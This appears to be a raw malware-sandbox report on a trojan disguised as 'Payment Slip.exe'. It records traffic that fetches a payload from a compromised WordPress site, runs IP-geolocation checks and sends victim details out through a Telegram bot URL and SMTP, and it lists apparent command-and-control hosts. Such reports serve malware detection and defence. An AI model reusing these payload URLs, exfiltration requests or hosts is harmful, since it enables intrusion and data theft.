          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: global trafficTCP traffic: 192.168.2.5:49734 -> 66.29.159.53:587
          Source: global trafficHTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wp-includes/MGGxuAN14.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.reap.skyestates.com.mtCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: www.reap.skyestates.com.mt
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: smtp.privateemail.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 08:06:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/8
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3290148759.0000000023700000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://s.symcd.com06
          Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.privateemail.com
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Masculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
          Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: Payment Slip.exe, Masculinity.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
          Source: Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
          Source: Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: Masculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBcq
          Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/
          Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3285985149.000000001FE90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: Payment Slip.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Masculinity.exeJump to dropped file
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,7_2_00403358
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00404B0E0_2_00404B0E
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040653D0_2_0040653D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_042AEAD82_2_042AEAD8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_042AF3A82_2_042AF3A8
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_042AE7902_2_042AE790
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00404B0E7_2_00404B0E
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0040653D7_2_0040653D
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015C19B7_2_0015C19B
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015D2CD7_2_0015D2CD
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_001553627_2_00155362
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015C4687_2_0015C468
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015D5997_2_0015D599
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015C7387_2_0015C738
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_001569A07_2_001569A0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_001529E07_2_001529E0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015CA087_2_0015CA08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015EC187_2_0015EC18
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00159DE07_2_00159DE0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00156FC87_2_00156FC8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015CFF87_2_0015CFF8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015F8047_2_0015F804
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015EC0C7_2_0015EC0C
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_0015FC507_2_0015FC50
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00153E097_2_00153E09
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A695907_2_04A69590
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A629707_2_04A62970
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A69E807_2_04A69E80
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A622887_2_04A62288
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A652907_2_04A65290
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6FA787_2_04A6FA78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A61BA87_2_04A61BA8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A60B307_2_04A60B30
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6CF087_2_04A6CF08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E4B17_2_04A6E4B1
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E4BF7_2_04A6E4BF
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E4C07_2_04A6E4C0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A600077_2_04A60007
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6DC017_2_04A6DC01
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6DC107_2_04A6DC10
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E0677_2_04A6E067
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E0687_2_04A6E068
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A600407_2_04A60040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E0597_2_04A6E059
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6F1B97_2_04A6F1B9
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A68DF97_2_04A68DF9
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6F1C87_2_04A6F1C8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E9087_2_04A6E908
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E9177_2_04A6E917
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6E9187_2_04A6E918
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6ED707_2_04A6ED70
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A652877_2_04A65287
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6F6207_2_04A6F620
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A68E087_2_04A68E08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A622787_2_04A62278
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A697B07_2_04A697B0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6D7B87_2_04A6D7B8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A61B977_2_04A61B97
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A60B207_2_04A60B20
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A6D3607_2_04A6D360
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A98FB07_2_04A98FB0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A981D07_2_04A981D0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A97B787_2_04A97B78
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A91EA87_2_04A91EA8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04A9FCA87_2_04A9FCA8
